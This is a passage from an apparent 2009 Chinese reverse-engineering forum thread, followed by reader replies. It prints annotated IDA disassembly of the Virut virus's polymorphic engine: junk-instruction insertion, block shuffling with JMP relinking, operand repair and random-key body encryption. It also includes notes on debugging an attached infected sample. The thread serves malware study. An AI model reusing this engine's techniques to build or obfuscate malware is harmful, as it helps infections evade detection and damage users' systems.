.remote:001B3D3F 01C 80 BD 10 55 1B 00+                cmp     ss:flag_find_import[ebp], 1 ; 是否找到导入kernel的函数
.remote:001B3D46 01C 75 05                             jnz     short loc_1B3D4D
.remote:001B3D48 01C 83 C2 04                          add     edx, 4
.remote:001B3D4B 01C 2B D0                             sub     edx, eax
.remote:001B3D4D
.remote:001B3D4D                       loc_1B3D4D:                             ; CODE XREF: sub_1B37FD+549j
.remote:001B3D4D 01C 03 C8                             add     ecx, eax
.remote:001B3D4F 01C B0 C6                             mov     al, 0C6h
.remote:001B3D51 01C 02 85 11 55 1B 00                 add     al, ss:rand_flag[ebp] ; 决定恢复OEP的两条指令  顺序
.remote:001B3D57 01C AA                                stosb
.remote:001B3D58 01C B0 05                             mov     al, 5
.remote:001B3D5A 01C AA                                stosb
.remote:001B3D5B 01C 8B C2                             mov     eax, edx
.remote:001B3D5D 01C 03 43 34                          add     eax, [ebx+34h]
.remote:001B3D60 01C AB                                stosd
.remote:001B3D61 01C 03 95 E6 54 1B 00                 add     edx, ss:entrypoint_offset_sub_rva[ebp]
.remote:001B3D67 01C 03 95 86 54 1B 00                 add     edx, ss:lpFileBase[ebp]
.remote:001B3D6D 01C 8B 02                             mov     eax, [edx]
.remote:001B3D6F 01C 80 BD 11 55 1B 00+                cmp     ss:rand_flag[ebp], 0 ; 决定恢复OEP的两条指令  顺序
.remote:001B3D76 01C 75 03                             jnz     short loc_1B3D7B
.remote:001B3D78 01C AA                                stosb
.remote:001B3D79 01C EB 01                             jmp     short loc_1B3D7C
.remote:001B3D7B                       ; ---------------------------------------------------------------------------
.remote:001B3D7B
.remote:001B3D7B                       loc_1B3D7B:                             ; CODE XREF: sub_1B37FD+579j
.remote:001B3D7B 01C AB                                stosd
.remote:001B3D7C
.remote:001B3D7C                       loc_1B3D7C:                             ; CODE XREF: sub_1B37FD+57Cj
.remote:001B3D7C 01C FE 85 10 55 1B 00                 inc     ss:flag_find_import[ebp] ; 是否找到导入kernel的函数
.remote:001B3D82 01C 80 B5 11 55 1B 00+                xor     ss:rand_flag[ebp], 1 ; 决定恢复OEP的两条指令  顺序
.remote:001B3D89 01C EB 2A                             jmp     short loc_1B3DB5 ; 修改指令为bts
.remote:001B3D89                       ; END OF FUNCTION CHUNK FOR sub_1B37FD
.remote:001B3D8B                       ; ---------------------------------------------------------------------------
.remote:001B3D8B EB 05                                 jmp     short loc_1B3D92
.remote:001B3D8D                       ; ---------------------------------------------------------------------------
.remote:001B3D8D                       ; START OF FUNCTION CHUNK FOR sub_1B37FD
.remote:001B3D8D
.remote:001B3D8D                       loc_1B3D8D:                             ; CODE XREF: sub_1B37FD+508j
.remote:001B3D8D                                                               ; sub_1B37FD+515j ...
.remote:001B3D8D 01C E8 82 0E 00 00                    call    get_instruction_length
.remote:001B3D92
.remote:001B3D92                       loc_1B3D92:                             ; CODE XREF: sub_1B37FD+46Bj
.remote:001B3D92                                                               ; sub_1B37FD+47Aj ...
.remote:001B3D92 01C C6 85 E1 3D 1B 00+                mov     byte ptr ss:(loc_1B3DE0+1)[ebp], 0B3h
.remote:001B3D99 01C 51                                push    ecx
.remote:001B3D9A 020 29 4C 24 08                       sub     [esp+20h+var_18], ecx
.remote:001B3D9E 020 F3 A4                             rep movsb
.remote:001B3DA0 020 59                                pop     ecx
.remote:001B3DA1 01C EB 19                             jmp     short loc_1B3DBC
.remote:001B3DA3                       ; ---------------------------------------------------------------------------
.remote:001B3DA3
.remote:001B3DA3                       loc_1B3DA3:                             ; CODE XREF: sub_1B37FD+454j
.remote:001B3DA3 01C 57                                push    edi
.remote:001B3DA4 020 F7 1C 24                          neg     [esp+20h+var_20]
.remote:001B3DA7 020 E8 4A F4 FF FF                    call    get_rabish
.remote:001B3DAC 020 59                                pop     ecx
.remote:001B3DAD 01C 03 CF                             add     ecx, edi
.remote:001B3DAF 01C 29 8D D2 54 1B 00                 sub     ss:number_rablish[ebp], ecx ; 花指令总数减少
.remote:001B3DB5
.remote:001B3DB5                       loc_1B3DB5:                             ; CODE XREF: sub_1B37FD+4F9j
.remote:001B3DB5                                                               ; sub_1B37FD+58Cj
.remote:001B3DB5 01C C6 85 E1 3D 1B 00+                mov     byte ptr ss:(loc_1B3DE0+1)[ebp], 0ABh ; 修改指令为bts
.remote:001B3DBC
.remote:001B3DBC                       loc_1B3DBC:                             ; CODE XREF: sub_1B37FD+5A4j
.remote:001B3DBC 01C 8B 04 24                          mov     eax, [esp+1Ch+var_1C]
.remote:001B3DBF 01C 66 01 8C C5 2A 17+                add     ss:block.n_NumberOfOpcode[ebp+eax*8], cx ; 变形后的OPCODE数增加
.remote:001B3DC7 01C 8D 57 FF                          lea     edx, [edi-1]
.remote:001B3DCA 01C E3 1E                             jecxz   short loc_1B3DEA
.remote:001B3DCC 01C 2B 95 CE 54 1B 00                 sub     edx, ss:virut_start_in_file_off[ebp]
.remote:001B3DD2 01C 3B 95 20 1B 1B 00                 cmp     edx, ss:new_body_offset[ebp] ; 变形后的body在virut中的偏移
.remote:001B3DD8 01C 76 06                             jbe     short loc_1B3DE0
.remote:001B3DDA 01C 81 EA 34 3D 00 00                 sub     edx, 3D34h      ; 3d34 body的大小
.remote:001B3DE0
.remote:001B3DE0                       loc_1B3DE0:                             ; CODE XREF: sub_1B37FD+5DBj
.remote:001B3DE0                                                               ; sub_1B37FD+5EBj
.remote:001B3DE0                                                               ; DATA XREF: ...
.remote:001B3DE0 01C 0F B3 95 44 1A 1B+                btr     ss:is_rabish[ebp], edx ;  位测试为1的则是垃圾指令
.remote:001B3DE7 01C 4A                                dec     edx
.remote:001B3DE8 01C E2 F6                             loop    loc_1B3DE0
.remote:001B3DEA
.remote:001B3DEA                       loc_1B3DEA:                             ; CODE XREF: sub_1B37FD+5CDj
.remote:001B3DEA 01C 58                                pop     eax
.remote:001B3DEB 018 59                                pop     ecx
.remote:001B3DEC 014 E9 4D FE FF FF                    jmp     loc_1B3C3E
.remote:001B3DF1                       ; ---------------------------------------------------------------------------
.remote:001B3DF1
.remote:001B3DF1                       loc_1B3DF1:                             ; CODE XREF: sub_1B37FD+43Cj
.remote:001B3DF1                                                               ; sub_1B37FD+443j
.remote:001B3DF1 014 59                                pop     ecx
.remote:001B3DF2 010 F6 84 C5 2B 17 1B+                test    byte ptr ss:(block.n_NumberOfOpcode+1)[ebp+eax*8], 80h
.remote:001B3DFA 010 75 0D                             jnz     short loc_1B3E09 ; 指令块处理完了
.remote:001B3DFC 010 B0 EB                             mov     al, 0EBh        ; 看指令块 是不是以跳转指令或者ret结尾的
.remote:001B3DFE 010 AA                                stosb
.remote:001B3DFF 010 83 C8 FF                          or      eax, 0FFFFFFFFh
.remote:001B3E02 010 E8 21 E4 FF FF                    call    rand_mul        ; 返回[0:eax)
.remote:001B3E07 010 92                                xchg    eax, edx        ; 不是的话  需要用JMP 来链接乱序后的指令块
.remote:001B3E08 010 AB                                stosd                   ; 生成JMP指令
.remote:001B3E09
.remote:001B3E09                       loc_1B3E09:                             ; CODE XREF: sub_1B37FD+5FDj
.remote:001B3E09 010 FE C9                             dec     cl
.remote:001B3E0B 010 0F 85 CC FD FF FF                 jnz     loc_1B3BDD

3.修复 操作数 一方面通过reloc_jmp数组 里的描述 来修复 另一方面 还需要修复 变形后增加的那些跳转指令
.remote:001B3E11 010 8B D7                             mov     edx, edi        ; 全部的指令块都处理完了后
.remote:001B3E13 010 2B 95 CE 54 1B 00                 sub     edx, ss:virut_start_in_file_off[ebp]
.remote:001B3E19 010 89 95 1C 1B 1B 00                 mov     ss:virut_length[ebp], edx ; 更新virut_length
.remote:001B3E1F
.remote:001B3E1F                       loc_1B3E1F:                             ; CODE XREF: sub_1B37FD+660j
.remote:001B3E1F 010 0F B7 84 29 30 1B+                movzx   eax, reloc_jmp.TarOffset[ecx+ebp] ; 开始修补 JMP指令后的操作数
.remote:001B3E27 010 E8 C8 F8 FF FF                    call    ensure_block    ; 返回eax 中的值在变形后的偏移
.remote:001B3E2C 010 50                                push    eax
.remote:001B3E2D 014 0F B7 84 29 2E 1B+                movzx   eax, reloc_jmp.NexOffset[ecx+ebp]
.remote:001B3E35 014 48                                dec     eax
.remote:001B3E36 014 E8 B9 F8 FF FF                    call    ensure_block    ; 返回eax 中的值在变形后的偏移
.remote:001B3E3B 014 40                                inc     eax
.remote:001B3E3C 014 29 04 24                          sub     [esp], eax
.remote:001B3E3F 014 0F B7 84 29 2C 1B+                movzx   eax, word ptr reloc_jmp.o_offset[ecx+ebp]
.remote:001B3E47 014 E8 A8 F8 FF FF                    call    ensure_block    ; 返回eax 中的值在变形后的偏移
.remote:001B3E4C 014 03 85 CE 54 1B 00                 add     eax, ss:virut_start_in_file_off[ebp]
.remote:001B3E52 014 8F 00                             pop     dword ptr [eax]
.remote:001B3E54 010 83 C1 06                          add     ecx, 6
.remote:001B3E57 010 81 F9 E4 00 00 00                 cmp     ecx, 0E4h
.remote:001B3E5D 010 72 C0                             jb      short loc_1B3E1F ; 开始修补 JMP指令后的操作数
.remote:001B3E5F 010 8B BD CE 54 1B 00                 mov     edi, ss:virut_start_in_file_off[ebp]
.remote:001B3E65 010 8D B5 24 17 1B 00                 lea     esi, block.o_NumberOfOpcode[ebp]
.remote:001B3E6B 010 03 BD 20 1B 1B 00                 add     edi, ss:new_body_offset[ebp] ; 变形后的body在virut中的偏移
.remote:001B3E71 010 68 08 04 00 00                    push    408h
.remote:001B3E76 014 81 C7 3C 05 00 00                 add     edi, 53Ch
.remote:001B3E7C 014 59                                pop     ecx
.remote:001B3E7D 010 F3 A4                             rep movsb
.remote:001B3E7F 010 33 C9                             xor     ecx, ecx        ; 复制block结构数组
.remote:001B3E81
.remote:001B3E81                       loc_1B3E81:                             ; CODE XREF: sub_1B37FD+6D9j
.remote:001B3E81 010 F6 84 CD 2B 17 1B+                test    byte ptr ss:(block.n_NumberOfOpcode+1)[ebp+ecx*8], 80h
.remote:001B3E89 010 75 43                             jnz     short loc_1B3ECE
.remote:001B3E8B 010 0F B7 94 CD 2A 17+                movzx   edx, ss:block.n_NumberOfOpcode[ebp+ecx*8] ; 修补指令块间的JMP即刚刚添加的JMP指令操作数
.remote:001B3E93 010 0F B7 84 CD 28 17+                movzx   eax, ss:block.n_offsetStart[ebp+ecx*8]
.remote:001B3E9B 010 81 E2 FF 7F 00 00                 and     edx, 7FFFh
.remote:001B3EA1 010 8D 44 02 02                       lea     eax, [edx+eax+2]
.remote:001B3EA5 010 0F B7 94 CD 30 17+                movzx   edx, ss:next_block.n_offsetStart[ebp+ecx*8]
.remote:001B3EAD 010 2B D0                             sub     edx, eax
.remote:001B3EAF 010 03 85 CE 54 1B 00                 add     eax, ss:virut_start_in_file_off[ebp]
.remote:001B3EB5 010 83 FA 80                          cmp     edx, 0FFFFFF80h
.remote:001B3EB8 010 7C 0A                             jl      short loc_1B3EC4
.remote:001B3EBA 010 83 FA 7F                          cmp     edx, 7Fh        ; 跳转的范围
.remote:001B3EBD 010 7F 05                             jg      short loc_1B3EC4
.remote:001B3EBF 010 88 50 FF                          mov     [eax-1], dl     ; 存放短跳转操作数
.remote:001B3EC2 010 EB 0A                             jmp     short loc_1B3ECE
.remote:001B3EC4                       ; ---------------------------------------------------------------------------
.remote:001B3EC4
.remote:001B3EC4                       loc_1B3EC4:                             ; CODE XREF: sub_1B37FD+6BBj
.remote:001B3EC4                                                               ; sub_1B37FD+6C0j
.remote:001B3EC4 010 83 EA 03                          sub     edx, 3
.remote:001B3EC7 010 C6 40 FE E9                       mov     byte ptr [eax-2], 0E9h ; 范围太大  修改指令为长跳转
.remote:001B3ECB 010 89 50 FF                          mov     [eax-1], edx
.remote:001B3ECE
.remote:001B3ECE                       loc_1B3ECE:                             ; CODE XREF: sub_1B37FD+68Cj
.remote:001B3ECE                                                               ; sub_1B37FD+6C5j
.remote:001B3ECE 010 FE C1                             inc     cl
.remote:001B3ED0 010 3A 8D 23 17 1B 00                 cmp     cl, ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B3ED6 010 72 A9                             jb      short loc_1B3E81

4.随机加密 body
.remote:001B3ED8 010 B8 00 00 01 00                    mov     eax, 10000h
.remote:001B3EDD 010 E8 46 E3 FF FF                    call    rand_mul        ; 返回[0:eax)
.remote:001B3EE2 010 52                                push    edx             ; 随机出加密body的key
.remote:001B3EE3 014 B8 4A 00 00 00                    mov     eax, 4Ah
.remote:001B3EE8 014 E8 07 F8 FF FF                    call    ensure_block    ; 返回eax 中的值在变形后的偏移
.remote:001B3EED 014 03 85 CE 54 1B 00                 add     eax, ss:virut_start_in_file_off[ebp]
.remote:001B3EF3 014 5A                                pop     edx
.remote:001B3EF4 010 66 89 10                          mov     [eax], dx       ; 更新KEY
.remote:001B3EF7 010 0F B7 8D 28 17 1B+                movzx   ecx, ss:block.n_offsetStart[ebp]
.remote:001B3EFE 010 8B 85 20 1B 1B 00                 mov     eax, ss:new_body_offset[ebp] ; 变形后的body在virut中的偏移
.remote:001B3F04 010 03 8D EE 54 1B 00                 add     ecx, ss:virut_start_in_section_rva[ebp]
.remote:001B3F0A 010 03 85 CE 54 1B 00                 add     eax, ss:virut_start_in_file_off[ebp]
.remote:001B3F10 010 89 8D 16 55 1B 00                 mov     ss:dword_1B5516[ebp], ecx
.remote:001B3F16 010 E8 31 D1 FF FF                    call    decode          ; 到此多态变形就结束了

说明:virut感染实际上是多种方式感染的 通过标志位来决定的  这个样本  virut是修改了  导入表的引用   
call  dword ptr[api]  变成了  jmp virut  附件中的样本直接运行 不会有任何现象的  因为 
没有运行到virut修改的那个引用 如果要调试 直接用OD 新建EIP到01007206


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 7
支持
分享
最新回复 (14)
雪    币: 303
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
支持。强文 沙发       ?
2009-9-15 22:48
0
雪    币: 339
活跃值: (29)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
3
virut这样的好东西怎么能够不学习?
谢谢
2009-9-16 09:12
0
雪    币: 122
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
学习了.
2009-9-18 10:59
0
雪    币: 401
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
分析的很好,学习了
2009-10-5 07:15
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
6
Support!
2009-10-6 20:35
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
恩,有些地方确实值得学习
2009-10-9 22:15
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
好东西必须先回复后下载!
2009-10-24 18:54
0
雪    币: 1233
活跃值: (907)
能力值: ( LV12,RANK:750 )
在线值:
发帖
回帖
粉丝
9
virus  ['vaiərəs]  
n. 病毒, 毒素, 有害的事物
2009-10-26 20:38
0
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
好东西先回复后下载!
2009-11-10 11:58
0
雪    币: 197
活跃值: (52)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
11
搞这玩意花了很大力气吧,
2009-11-14 17:45
0
雪    币: 1373
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
研究病毒,学习了。
2009-11-15 20:52
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
学习了。。。
2009-11-21 08:27
0
雪    币: 71
活跃值: (10)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
15
你不但功利,你还很犀利!哈
2009-11-21 19:13
0
雪    币: 142
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
强大。学习之。
2009-11-21 23:46
0
游客
登录 | 注册 方可回帖
返回
//